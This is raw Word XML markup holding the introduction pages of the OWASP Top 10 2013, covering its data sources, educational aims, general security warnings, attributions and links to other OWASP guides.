    <w:p w14:paraId="23973A1F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="2016"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>or distribution, you must make it clear to others the license terms of this work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D876F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656194CC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="3"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6B965077" w14:textId="01B78D93" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2304"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="747"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1E549DB1">
          <v:shape id="imagerId18" o:spid="_x0000_s2960" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:106pt;height:96pt;z-index:-252052992;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId18" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2F326386">
          <v:shape id="imagerId19" o:spid="_x0000_s2959" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:329pt;margin-top:368pt;width:140pt;height:35pt;z-index:-252051968;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId19" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3B20C573">
          <v:shapetype id="_x0000_m2958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343A856">
          <v:shape id="_x0000_s2957" type="#_x0000_m2958" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25206630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059DEA1A">
          <v:shapetype id="polygon2" o:spid="_x0000_m2956" coordsize="54000,3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62A887E">
          <v:shape id="WS_polygon2" o:spid="_x0000_s2955" type="#polygon2" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90pt;width:540pt;height:30pt;z-index:-252065280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78C30138">
          <v:shapetype id="polygon3" o:spid="_x0000_m2954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C12AB11">
          <v:shape id="WS_polygon3" o:spid="_x0000_s2953" type="#polygon3" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.5pt;width:541pt;height:1pt;z-index:25117235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3399068">
          <v:shapetype id="polygon4" o:spid="_x0000_m2952" coordsize="200,1952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65A88A">
          <v:shape id="WS_polygon4" o:spid="_x0000_s2951" type="#polygon4" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89pt;width:2pt;height:195.2pt;z-index:25117337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0FFB044">
          <v:shapetype id="polygon5" o:spid="_x0000_m2950" coordsize="200,1952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C19FD8A">
          <v:shape id="WS_polygon5" o:spid="_x0000_s2949" type="#polygon5" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:89pt;width:2pt;height:195.2pt;z-index:25117440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7C2072FE">
          <v:shapetype id="polygon6" o:spid="_x0000_m2948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3E86EA4">
          <v:shape id="WS_polygon6" o:spid="_x0000_s2947" type="#polygon6" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.5pt;width:541pt;height:1pt;z-index:25117542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06E94081">
          <v:shapetype id="_x0000_m2946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D5C4DCF">
          <v:shape id="WS_polygon7" o:spid="_x0000_s2945" type="#_x0000_m2946" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:282.7pt;width:541pt;height:1pt;z-index:25117644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921D9D7">
          <v:shapetype id="polygon35" o:spid="_x0000_m2944" coordsize="26400,271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2AEC633">
          <v:shape id="WS_polygon35" o:spid="_x0000_s2943" type="#polygon35" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:4in;width:264pt;height:27.1pt;z-index:-252064256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45F67C1A">
          <v:shapetype id="polygon36" o:spid="_x0000_m2942" coordsize="265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C03C8AA">
          <v:shape id="WS_polygon36" o:spid="_x0000_s2941" type="#polygon36" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:314.6pt;width:265.5pt;height:1pt;z-index:25119385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5835E5B7">
          <v:shapetype id="polygon37" o:spid="_x0000_m2940" coordsize="200,434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6BA9405">
          <v:shape id="WS_polygon37" o:spid="_x0000_s2939" type="#polygon37" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:287pt;width:2pt;height:434pt;z-index:25119488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5ECD44ED">
          <v:shapetype id="polygon38" o:spid="_x0000_m2938" coordsize="200,434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3DA3262">
          <v:shape id="WS_polygon38" o:spid="_x0000_s2937" type="#polygon38" style="position:absolute;left:0;text-align:left;margin-left:263.5pt;margin-top:287pt;width:2pt;height:434pt;z-index:25119590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4CB9DDC">
          <v:shapetype id="polygon39" o:spid="_x0000_m2936" coordsize="265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73ECF7">
          <v:shape id="WS_polygon39" o:spid="_x0000_s2935" type="#polygon39" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:287.5pt;width:265.5pt;height:1pt;z-index:25119692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456BD15">
          <v:shapetype id="polygon51" o:spid="_x0000_m2934" coordsize="1077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EA0CA7C">
          <v:shape id="WS_polygon51" o:spid="_x0000_s2933" type="#polygon51" style="position:absolute;left:0;text-align:left;margin-left:23pt;margin-top:361.55pt;width:107.75pt;height:.6pt;z-index:-25206323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984DA8E">
          <v:shapetype id="polygon52" o:spid="_x0000_m2932" coordsize="82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8C13574">
          <v:shape id="WS_polygon52" o:spid="_x0000_s2931" type="#polygon52" style="position:absolute;left:0;text-align:left;margin-left:166.4pt;margin-top:361.55pt;width:82.3pt;height:.6pt;z-index:-25206220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72C8200">
          <v:shapetype id="polygon69" o:spid="_x0000_m2930" coordsize="111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1841230">
          <v:shape id="WS_polygon69" o:spid="_x0000_s2929" type="#polygon69" style="position:absolute;left:0;text-align:left;margin-left:98.4pt;margin-top:409.55pt;width:111.95pt;height:.6pt;z-index:-25206118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2BAB3A0">
          <v:shapetype id="_x0000_m2928" coordsize="149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F89C216">
          <v:shape id="_x0000_s2927" type="#_x0000_m2928" style="position:absolute;left:0;text-align:left;margin-left:7.2pt;margin-top:553.55pt;width:149.5pt;height:.55pt;z-index:-25206016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2E7B257">
          <v:shapetype id="polygon126" o:spid="_x0000_m2926" coordsize="171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DB18041">
          <v:shape id="_x0000_s2925" type="#polygon126" style="position:absolute;left:0;text-align:left;margin-left:56.85pt;margin-top:673.55pt;width:171pt;height:.55pt;z-index:-25205913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D9236D8">
          <v:shapetype id="polygon134" o:spid="_x0000_m2924" coordsize="746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D4EF89F">
          <v:shape id="WS_polygon134" o:spid="_x0000_s2923" type="#polygon134" style="position:absolute;left:0;text-align:left;margin-left:76.2pt;margin-top:685.55pt;width:74.6pt;height:.55pt;z-index:-25205811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9A4EB38">
          <v:shapetype id="polygon135" o:spid="_x0000_m2922" coordsize="27000,270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6E075C6">
          <v:shape id="WS_polygon135" o:spid="_x0000_s2921" type="#polygon135" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:287.95pt;width:270pt;height:27.05pt;z-index:-252057088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3C12E9C6">
          <v:shapetype id="polygon136" o:spid="_x0000_m2920" coordsize="271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C9F174A">
          <v:shape id="WS_polygon136" o:spid="_x0000_s2919" type="#polygon136" style="position:absolute;left:0;text-align:left;margin-left:269pt;margin-top:314.55pt;width:271.5pt;height:1pt;z-index:25122150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3E4D3ADD">
          <v:shapetype id="polygon137" o:spid="_x0000_m2918" coordsize="200,434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3D806FA">
          <v:shape id="WS_polygon137" o:spid="_x0000_s2917" type="#polygon137" style="position:absolute;left:0;text-align:left;margin-left:269.5pt;margin-top:287pt;width:2pt;height:434pt;z-index:25122252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019084BC">
          <v:shapetype id="polygon138" o:spid="_x0000_m2916" coordsize="271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040C098">
          <v:shape id="WS_polygon138" o:spid="_x0000_s2915" type="#polygon138" style="position:absolute;left:0;text-align:left;margin-left:269pt;margin-top:287.5pt;width:271.5pt;height:1pt;z-index:25122355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F2945B5">
          <v:shapetype id="polygon167" o:spid="_x0000_m2914" coordsize="624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6428D4">
          <v:shape id="WS_polygon167" o:spid="_x0000_s2913" type="#polygon167" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:452.7pt;width:62.4pt;height:.6pt;z-index:251232768;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#3a6331" strokeweight="0">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="267F16D2">
          <v:shapetype id="polygon178" o:spid="_x0000_m2912" coordsize="114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49B4CE7">
          <v:shape id="WS_polygon178" o:spid="_x0000_s2911" type="#polygon178" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:464.7pt;width:11.4pt;height:.6pt;z-index:251233792;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#3a6331" strokeweight="0">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="04E2393A">
          <v:shapetype id="polygon187" o:spid="_x0000_m2910" coordsize="663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5BA0A8F">
          <v:shape id="WS_polygon187" o:spid="_x0000_s2909" type="#polygon187" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:476.7pt;width:66.35pt;height:.6pt;z-index:-25205606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D33FB65">
          <v:shapetype id="polygon197" o:spid="_x0000_m2908" coordsize="290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E403DD0">
          <v:shape id="WS_polygon197" o:spid="_x0000_s2907" type="#polygon197" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:488.7pt;width:29pt;height:.6pt;z-index:251234816;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#3a6331" strokeweight="0">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1190329A">
          <v:shapetype id="polygon208" o:spid="_x0000_m2906" coordsize="90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3F1EFD8">
          <v:shape id="WS_polygon208" o:spid="_x0000_s2905" type="#polygon208" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:500.7pt;width:90.95pt;height:.6pt;z-index:-25205504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38B309F">
          <v:shapetype id="polygon217" o:spid="_x0000_m2904" coordsize="38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D526F8">
          <v:shape id="WS_polygon217" o:spid="_x0000_s2903" type="#polygon217" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:512.7pt;width:38.5pt;height:.6pt;z-index:251235840;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#3a6331" strokeweight="0">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1544BE74">
          <v:shapetype id="polygon226" o:spid="_x0000_m2902" coordsize="908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94B3120">
          <v:shape id="WS_polygon226" o:spid="_x0000_s2901" type="#polygon226" style="position:absolute;left:0;text-align:left;margin-left:304.4pt;margin-top:524.7pt;width:90.8pt;height:.55pt;z-index:-252054016;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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I</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A26D4F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0099D6D3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="747"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D31E37" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="747"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463AFB59" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="747"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC962BB" w14:textId="6FFDAA0F" w:rsidR="00F13059" w:rsidRDefault="007D6D9A" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="359" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>欢迎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDD768D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="421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Welcome to the OWASP Top 10 2013! This update broadens one of the categories from the 2010 version to be more inclusive of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19D82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common, important vulnerabilities, and reorders some of the others based on changing prevalence data.  It also brings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C868E0A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component security into the spotlight by creating a specific category for this risk, pulling it out of the obscurity of the fine print of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103D3B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 2010 risk A6: Security Misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF367B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2039DC5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The OWASP Top 10 for 2013 is based on 8 datasets from 7 firms that specialize in application security, including 4 consulting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C685F0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companies and 3 tool/SaaS vendors (1 static, 1 dynamic, and 1 with both). This data spans over 500,000 vulnerabilities across</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D38F4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hundreds of organizations and thousands of applications. The Top 10 items are selected and prioritized according to this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4ED0A4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prevalence data, in combination with consensus estimates of exploitability, detectability, and impact estimates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A701E9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77013BC8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The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F5654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consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F92E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gainst these high risk problem areas – and also provides guidance on where to go from here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A349A0F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4F073D57" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C9113D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="390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Warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A73ACF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3187F563" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="320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Don’t stop at 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. There are hundreds of issues that could</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD96CE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affect the overall security of a web application as discussed in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF2D63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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWAS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Develop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Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> and the </w:t>
      </w:r>
      <w:hyperlink r:id="rId20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21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22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Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64ACEC8E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58FBE943" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="389" w:lineRule="exact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Attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53309BD6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD73B2F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="320" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Thanks to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94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4"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Aspect Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> for initiating, leading, and updating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0636C3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241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he OWASP Top 10 since its inception in 2003, and to its</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FDBFD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primary authors: Jeff Williams and Dave Wichers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11574A36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5545" w:space="0"/>
            <w:col w:w="5255" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC6B02A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:hyperlink r:id="rId23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Series</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00810992"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.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These are essential reading for anyone developing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D611E1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web applications. Guidance on how to effectively find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC223D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vulnerabilities in web applications is provided in the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2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OWASP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F4A3562" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:hyperlink r:id="rId26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Testing Guide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and the </w:t>
      </w:r>
      <w:hyperlink r:id="rId27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OWASP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28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Code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29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Review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30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Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00810992"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.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CEEC56C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="239" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="5401"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>We’d like to thank those organizations that contributed their</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F188B62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6BA835EB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lastRenderedPageBreak/>
        <w:t>Constant change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. This Top 10 will continue to change. Even</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F297A5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without changing a single line of your application’s code, you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65486E0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may become vulnerable as new flaws are discovered and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B28C8A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ttack methods are refined. Please review the advice at the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC65D3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end of the Top 10 in “What’s Next For Developers, Verifiers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F364C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nd Organizations” for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DA639" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138E8538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Think positive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. When you’re ready to stop chasing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9964C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vulnerabilities and focus on establishing strong application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBD8F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ecurity controls, OWASP has produced the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32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Application</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="217E8DAA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:hyperlink r:id="rId33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Security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34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Verification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35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Standard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36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(ASVS)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as a guide to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D6CC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organizations and application reviewers on what to verify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1111F238" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78861A78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Use tools wisely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. Security vulnerabilities can be quite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB25C6A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complex and buried in mountains of code. In many cases, the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14901ADD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most cost-effective approach for finding and eliminating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77634748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se weaknesses is human experts armed with good tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B27B6F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783628EA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Push left</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. Focus on making security an integral part of your</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC7FC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culture throughout your development organization. Find out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50500A2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more in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId37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Open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3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Software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39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ssurance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0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Maturity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Model</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29A17D57" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:proofErr w:type="gramStart"/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(SAMM)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and the </w:t>
      </w:r>
      <w:hyperlink r:id="rId43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Rugged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4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Handbook</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00810992"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.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="335234EB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>vulnerability prevalence data to support the 2013 update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C4EBB1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384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hyperlink r:id="rId4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spec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–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4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Statistics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6492DAB6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hyperlink r:id="rId4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–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Statistics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> from both Fortify and WebInspect</w:t>
      </w:r>
    </w:p>
